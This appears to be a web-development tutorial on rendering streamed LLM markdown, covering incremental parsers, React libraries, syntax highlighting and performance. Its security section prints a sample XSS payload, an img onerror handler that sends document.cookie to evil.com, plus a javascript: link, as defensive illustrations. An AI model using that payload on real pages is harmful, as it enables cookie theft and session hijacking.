Skip to content

Markdown Streaming and Incremental Parsing

advanced18 min read

The Markdown That Arrives One Token at a Time

Here is something that bites every developer building an AI chat interface: LLMs do not send you a finished response. They stream it. Token by token. And those tokens form markdown — headings, bold text, code blocks, tables, links — that is structurally incomplete until the very last token arrives.

Try rendering **this is bol as markdown. That is not bold text. That is a broken paragraph with two literal asterisks. Now imagine this happening 30 times per second as tokens arrive. The result? A janky, flickering mess that makes users think your app is broken.

This is the fundamental problem of markdown streaming, and solving it well is what separates a polished AI product from a prototype.

Mental Model

Think of streaming markdown like receiving a jigsaw puzzle one piece at a time through a mail slot. A traditional markdown parser is like someone who dumps all the pieces on a table and assembles them at once — they need the complete picture. An incremental parser is like someone standing at the mail slot, fitting each piece into the growing picture the moment it arrives. They never need to see all pieces at once, and they never tear apart work they have already done.

Flash of Incomplete Markdown (FOIM)

You have heard of FOUC (Flash of Unstyled Content). Meet its cousin: FOIM — Flash of Incomplete Markdown. It is the visual glitch users see when you naively render a partial markdown stream.

Here is what FOIM looks like in practice:

Token stream:          What the user sees:
─────────────         ─────────────────────
"Here is a "          Here is a
"**bold"              Here is a **bold
"** word"             Here is a bold word       ← fixed, but flickered
"and a `code"         Here is a bold word and a `code
"` block"             Here is a bold word and a code block

Every time a structural markdown token arrives incomplete — an unclosed **, a dangling backtick, an opening [ without a ] — the parser either renders it as literal characters or produces broken HTML. Then when the closing token arrives, everything jumps into the correct format. The user sees a constant stutter between "broken" and "fixed."

The worst offender? Code blocks. A fenced code block with triple backticks needs both an opening and closing fence. During streaming, you might have dozens of lines of code rendered as a plain paragraph because the closing fence has not arrived yet.

Quiz
What causes the Flash of Incomplete Markdown problem?

Three Approaches to the Problem

There are three fundamentally different strategies for rendering streamed markdown. Each makes a different tradeoff between complexity, performance, and visual quality.

ApproachHow It WorksCost Per TokenFOIM?Complexity
Full reparseReparse the entire accumulated string on every tokenO(n) where n is total lengthNo — always a complete parseLow — just call your parser again
Incremental parsingParse only the new chunk, append to existing AST/DOMO(k) where k is chunk sizeNo — parser tracks open delimitersHigh — need a streaming-aware parser
Deferred renderingBuffer tokens, render only when a structural unit is completeO(1) amortizedNo — but introduces latencyMedium — need delimiter detection

Full Reparse: The Brute Force Approach

This is what most developers reach for first. On every new token, concatenate it to a buffer string, then pass the entire string through a markdown parser like remark or marked.

let buffer = '';

function onToken(token: string) {
  buffer += token;
  const html = marked.parse(buffer);
  container.innerHTML = html;
}

It works. No FOIM, because the parser handles incomplete markdown gracefully (most parsers treat unclosed delimiters as literal text). But the cost is brutal.

After 1,000 tokens, every new token reparses all 1,000 tokens. After 5,000 tokens, every token reparses 5,000. This is O(n) per token, which means O(n squared) total for the entire response. For a long response with code blocks and tables, you will notice visible lag around 2,000-3,000 tokens.

And it gets worse: if you are rendering with React, every reparse produces a completely new DOM tree, which means React diffs the entire output on every single token. Layout thrashing, GC pressure, dropped frames.

Incremental Parsing: Parse Once, Append Forever

This is the correct solution for production. An incremental parser maintains internal state — it knows which delimiters are currently open, what block context it is in (paragraph, code block, list), and where the rendered output ends. When a new chunk arrives, it only parses that chunk in the context of the current state.

import { StreamingMarkdown } from 'streaming-markdown';

const renderer = new StreamingMarkdown(container);

function onToken(token: string) {
  renderer.push(token);
}

The cost per token is O(k) where k is the size of the chunk — typically a few characters. Total cost for the entire response: O(n). That is a massive difference from the full-reparse O(n squared).

The streaming-markdown library takes this approach. It maintains a state machine that tracks open delimiters, and it directly manipulates the DOM — appending new elements or text nodes as tokens arrive, never touching previously rendered content.

Deferred Rendering: Wait for Completeness

A middle-ground approach: buffer tokens until you can detect that a structural unit is complete, then render that unit. For example, wait until you see a complete paragraph (double newline), a complete code block (both fences), or a complete inline element (matching delimiters).

let buffer = '';
let rendered = '';

function onToken(token: string) {
  buffer += token;
  const completeParts = extractCompleteParts(buffer);
  if (completeParts) {
    rendered += marked.parse(completeParts);
    buffer = buffer.slice(completeParts.length);
    container.innerHTML = rendered;
  }
}

This avoids FOIM and keeps reparse cost low, but introduces visible latency. Users see nothing while a code block is streaming (which could be many seconds), then the entire block appears at once. That is arguably worse than FOIM for perceived performance.

Quiz
A streaming LLM response contains 4,000 tokens. With the full-reparse approach, approximately how many total tokens does the parser process across all updates?

How Incremental Parsers Work

The key insight behind incremental markdown parsing: markdown is a state machine. At any point during a stream, the parser is in one of several states — paragraph, heading, code block, emphasis, strong emphasis, link text, and so on. Each new character either transitions the state or produces output.

The State Machine

Here is a simplified version of the states an incremental markdown parser tracks:

type ParserState =
  | 'paragraph'
  | 'heading'
  | 'code_block'
  | 'code_inline'
  | 'emphasis'
  | 'strong'
  | 'link_text'
  | 'link_url'
  | 'list_item'
  | 'table';

interface StreamParser {
  state: ParserState;
  openDelimiters: string[];
  currentElement: HTMLElement;
  buffer: string;
}

When the parser receives **, it transitions from paragraph to strong, opens a <strong> element, and pushes ** onto the open delimiter stack. When it receives the closing **, it closes the element and pops the delimiter. If the stream ends without a closing delimiter, the parser can handle it gracefully — either leaving the element open (it will be closed when more tokens arrive) or treating the delimiter as literal text.

This is fundamentally different from a batch parser like remark, which builds an entire AST from a complete string. Batch parsers have no concept of "more input coming later."

The streaming-markdown Library

The streaming-markdown library implements exactly this pattern. It creates a parser instance bound to a container element, and you feed it chunks as they arrive:

import { smd_create, smd_push, smd_cleanup } from 'streaming-markdown';

const container = document.getElementById('output');
const parser = smd_create(container);

const response = await fetch('/api/chat', { method: 'POST', body: prompt });
const reader = response.body.getReader();
const decoder = new TextDecoder();

while (true) {
  const { done, value } = await reader.read();
  if (done) break;
  smd_push(parser, decoder.decode(value, { stream: true }));
}

smd_cleanup(parser);

Key characteristics:

  • Zero dependencies — pure JavaScript, no remark/unified overhead
  • Direct DOM manipulation — no virtual DOM diffing, no React reconciliation
  • Handles incomplete delimiters — the state machine tracks what is open
  • Tiny bundle — around 4KB minified
Why direct DOM manipulation beats virtual DOM here

When rendering streamed markdown with React, every token triggers a state update, which triggers reconciliation, which diffs the entire markdown output tree. Even with React 19's concurrent features, this creates unnecessary work because the diff always results in "append one text node or element." Direct DOM manipulation with appendChild and textContent appending is O(1) per operation — no diffing, no fiber tree traversal, no commit phase. For streaming scenarios where you are appending 30+ times per second, this difference matters.

React Solutions

Direct DOM manipulation is fast, but most AI applications are built with React. You need solutions that work within React's rendering model.

react-markdown: Safe but Slow

react-markdown is the standard React component for rendering markdown. It is safe (no dangerouslySetInnerHTML), extensible (remark/rehype plugins), and battle-tested. But it was not designed for streaming.

function ChatMessage({ content }: { content: string }) {
  return <ReactMarkdown>{content}</ReactMarkdown>;
}

Every time content changes (on every token), react-markdown reparses the entire string with remark, builds a new AST, transforms it through any plugins, and renders a new React element tree. React then diffs the old and new trees. This is the full-reparse approach wrapped in React — O(n) per token.

For short responses (under ~1,000 tokens), this is fine. For longer responses with code blocks and tables, you will see frame drops.

streamdown: The Streaming-First Alternative

streamdown is a drop-in replacement for react-markdown designed specifically for streaming. It handles unterminated markdown blocks gracefully and uses an incremental parser internally:

import { Streamdown } from 'streamdown';

function ChatMessage({ content }: { content: string }) {
  return <Streamdown>{content}</Streamdown>;
}

Under the hood, streamdown tracks the previously rendered length. When content grows, it only parses the new portion and appends the result. This gives you O(k) per token within React's component model.

markdown-to-jsx: The optimizeForStreaming Option

markdown-to-jsx offers an optimizeForStreaming option that smooths the visual experience during streaming:

import Markdown from 'markdown-to-jsx';

function ChatMessage({ content }: { content: string }) {
  return (
    <Markdown options={{ optimizeForStreaming: true }}>
      {content}
    </Markdown>
  );
}

This flag detects incomplete markdown structures (unclosed bold, italic, links, code spans, HTML tags) and suppresses their rendering until the closing delimiter arrives. Without it, users see distracting flashes of raw markdown syntax between tokens. Note that this does not solve the O(n) reparse cost -- markdown-to-jsx still reparses the full string on each update. It solves the visual glitch problem, not the performance problem.

Quiz
Why is react-markdown not optimized for streaming even though it produces correct output?

Code Block Handling: The Hardest Part

Code blocks are the single most challenging element to handle during streaming. Here is why:

  1. Fenced code blocks need both delimiters — until the closing triple backtick arrives, you do not know if you are inside a code block or looking at an inline code span
  2. Language detection — the language identifier comes right after the opening fence (```typescript). You need it for syntax highlighting, but it arrives before any code content
  3. Syntax highlighting is expensive — running Shiki or Prism on every token inside a code block adds significant cost
  4. Indentation matters — code inside a code block should not be parsed as markdown (no bold, no links, no headings)

Detecting Incomplete Fences

An incremental parser tracks whether it is inside a code block with a simple state flag:

let inCodeBlock = false;
let codeBlockContent = '';
let codeBlockLang = '';

function processToken(token: string) {
  const lines = (codeBlockContent + token).split('\n');

  for (const line of lines) {
    if (line.trim().startsWith('```') && !inCodeBlock) {
      inCodeBlock = true;
      codeBlockLang = line.trim().slice(3).trim();
    } else if (line.trim() === '```' && inCodeBlock) {
      inCodeBlock = false;
      highlightAndRender(codeBlockContent, codeBlockLang);
      codeBlockContent = '';
    } else if (inCodeBlock) {
      codeBlockContent += line + '\n';
    }
  }
}

Syntax Highlighting During Streaming

You have two options for syntax highlighting streamed code:

Option 1: Highlight on every token — Run the highlighter on the accumulated code block content each time a new token arrives. This gives instant, accurate highlighting but is expensive. Shiki parses the entire code block each time.

Option 2: Highlight on completion — Show raw code (with a monospace font and code-block styling) during streaming, then run the highlighter once when the closing fence arrives. This is cheaper but creates a visual flash when highlighting activates.

The best approach for production: use a debounced hybrid. Show raw code immediately, and schedule a highlight pass with requestIdleCallback or a debounce. If the next token arrives before the highlight runs, cancel and reschedule. This gives near-instant raw rendering with progressive highlighting that does not block the main thread.

let highlightTimer: number | null = null;

function onCodeToken(token: string) {
  appendRawCode(token);

  if (highlightTimer) cancelIdleCallback(highlightTimer);
  highlightTimer = requestIdleCallback(() => {
    highlightCurrentBlock();
  });
}
Common Trap

Never run syntax highlighting synchronously on every streaming token. Shiki and Prism both do significant work — tokenizing, applying themes, generating HTML. At 30+ tokens per second inside a code block, synchronous highlighting will absolutely drop frames. Always debounce or defer to requestIdleCallback.

Performance: The Numbers

Let us quantify the difference between full reparse and incremental parsing with concrete numbers.

Assume an LLM response of 3,000 tokens (a typical detailed answer), with an average token size of 4 characters (12,000 characters total).

Full reparse (react-markdown with remark):

  • Token 1: parse 4 chars
  • Token 100: parse 400 chars
  • Token 1,000: parse 4,000 chars
  • Token 3,000: parse 12,000 chars
  • Total characters parsed: ~18,000,000 (n squared / 2)
  • At a parse rate of ~1M chars/sec for remark: ~18 seconds of CPU time spread across the stream
  • Plus React reconciliation on every token: another ~6 seconds
  • Result: visible jank after ~1,500 tokens

Incremental parsing (streaming-markdown):

  • Each token: parse ~4 chars, append to DOM
  • Total characters parsed: 12,000 (exactly n)
  • At ~1M chars/sec: ~12 milliseconds total
  • No React reconciliation (direct DOM)
  • Result: smooth at any response length

That is a 1,500x reduction in parse work for a 3,000-token response. And the gap grows quadratically — a 10,000-token response would be ~15,000x less work.

Execution Trace
Token 1
Both approaches: parse 4 characters
No measurable difference yet
Token 500
Full reparse: parsing 2,000 chars. Incremental: parsing 4 chars.
500x difference
Token 1,500
Full reparse: parsing 6,000 chars — first visible frame drops
Users start noticing lag
Token 2,500
Full reparse: parsing 10,000 chars — consistent jank
Incremental still at 4 chars per token
Token 3,000
Full reparse: final parse of 12,000 chars. Incremental: done in 12ms total.
1,500x less total work for incremental
Quiz
A chat app uses react-markdown to render streamed responses. Users report that short responses feel snappy but long technical answers become laggy. What is the most likely cause?

Security: Why Rendering Matters

Markdown rendering in AI applications introduces a security surface that many developers overlook. The LLM output is user-influenced — prompt injection can cause the model to output arbitrary markdown, including links, images, and HTML.

The dangerouslySetInnerHTML Trap

Some markdown parsers output raw HTML strings, which you then inject into the DOM:

function UnsafeChatMessage({ content }: { content: string }) {
  const html = marked.parse(content);
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
}

This is an XSS vector. If the LLM outputs markdown containing raw HTML (which many models do when asked), you are injecting that HTML directly into the page:

Check out this helpful link:
<img src="x" onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">

marked.parse() with default settings will include that <img> tag in its output, and dangerouslySetInnerHTML will execute the onerror handler.

react-markdown Is Safe by Design

react-markdown does not use dangerouslySetInnerHTML. It builds a React element tree from the AST, which means raw HTML in the markdown source is rendered as literal text, not executed. This is why react-markdown remains popular despite its streaming performance issues — safety is built in.

What About Incremental Parsers?

streaming-markdown directly manipulates the DOM, so you need to verify that it does not inject raw HTML from the markdown source. The library creates elements via document.createElement and sets text via textContent (not innerHTML), which is safe against XSS.

However, any parser that outputs HTML strings and uses innerHTML is vulnerable. Always audit the rendering path.

Always sanitize if using innerHTML

If your rendering pipeline produces HTML strings, run them through DOMPurify before injection. Better yet, use a parser that creates DOM elements directly or builds React elements from an AST — neither approach is vulnerable to XSS from markdown content.

Even with safe rendering, LLM-generated links can be malicious. A model could output [click here](javascript:alert('xss')) or link to phishing sites. Always validate link URLs:

function isSafeUrl(url: string): boolean {
  try {
    const parsed = new URL(url);
    return ['http:', 'https:', 'mailto:'].includes(parsed.protocol);
  } catch {
    return false;
  }
}
What developers doWhat they should do
Using dangerouslySetInnerHTML to render LLM markdown output
LLM output can contain injected HTML via prompt injection — dangerouslySetInnerHTML executes it as real HTML, enabling XSS
Use react-markdown, streamdown, or a parser that creates DOM elements directly
Reparsing the entire accumulated string on every streaming token
Full reparse is O(n) per token, O(n squared) total — causes visible lag on responses over 1,500 tokens
Use an incremental parser like streaming-markdown or streamdown
Running syntax highlighting synchronously on every code token
Syntax highlighters like Shiki do heavy tokenization work — running them 30+ times per second blocks the main thread
Debounce highlighting with requestIdleCallback or render raw code and highlight on block completion
Assuming LLM-generated markdown links are safe
Prompt injection can cause models to output malicious links — always validate URLs before rendering
Validate link protocols and filter out javascript: and data: URLs
Using deferred rendering to avoid FOIM
Deferred rendering hides content until structures are complete — users see nothing during long code blocks, hurting perceived performance
Use incremental parsing that handles incomplete delimiters gracefully

Putting It All Together

Here is a production-ready pattern for streaming markdown in a React application:

import { useRef, useEffect, useCallback } from 'react';
import { smd_create, smd_push, smd_cleanup } from 'streaming-markdown';

function StreamingMessage({ streamUrl }: { streamUrl: string }) {
  const containerRef = useRef<HTMLDivElement>(null);
  const parserRef = useRef<ReturnType<typeof smd_create> | null>(null);

  const startStream = useCallback(async () => {
    if (!containerRef.current) return;

    parserRef.current = smd_create(containerRef.current);

    const response = await fetch(streamUrl);
    const reader = response.body!.getReader();
    const decoder = new TextDecoder();

    try {
      while (true) {
        const { done, value } = await reader.read();
        if (done) break;
        smd_push(parserRef.current, decoder.decode(value, { stream: true }));
      }
    } finally {
      if (parserRef.current) smd_cleanup(parserRef.current);
    }
  }, [streamUrl]);

  useEffect(() => {
    startStream();
  }, [startStream]);

  return <div ref={containerRef} className="prose" />;
}

This component:

  • Uses streaming-markdown for O(1)-per-token incremental parsing
  • Handles the ReadableStream from a fetch response directly
  • Cleans up the parser when the stream ends
  • Renders into a container div without React reconciliation overhead

For applications that need React-rendered markdown (custom components, plugin support), use streamdown instead — it gives you incremental parsing within React's component model.

Key Rules
  1. 1Never reparse the entire markdown string on every streaming token — it is O(n) per token, O(n squared) total.
  2. 2Use incremental parsers like streaming-markdown or streamdown that parse only new content in O(k) per token.
  3. 3Never use dangerouslySetInnerHTML to render LLM-generated markdown — it is an XSS vector via prompt injection.
  4. 4Debounce syntax highlighting during code block streaming — run the highlighter on idle, not on every token.
  5. 5Always validate URLs in LLM-generated links — filter out javascript: and data: protocol URLs.
  6. 6For React apps needing plugin support, use streamdown as a drop-in react-markdown replacement with streaming optimization.
Quiz
You are building a production AI chat app. The requirements are: streaming markdown rendering, custom React components in markdown, remark plugin support, and XSS safety. Which approach should you use?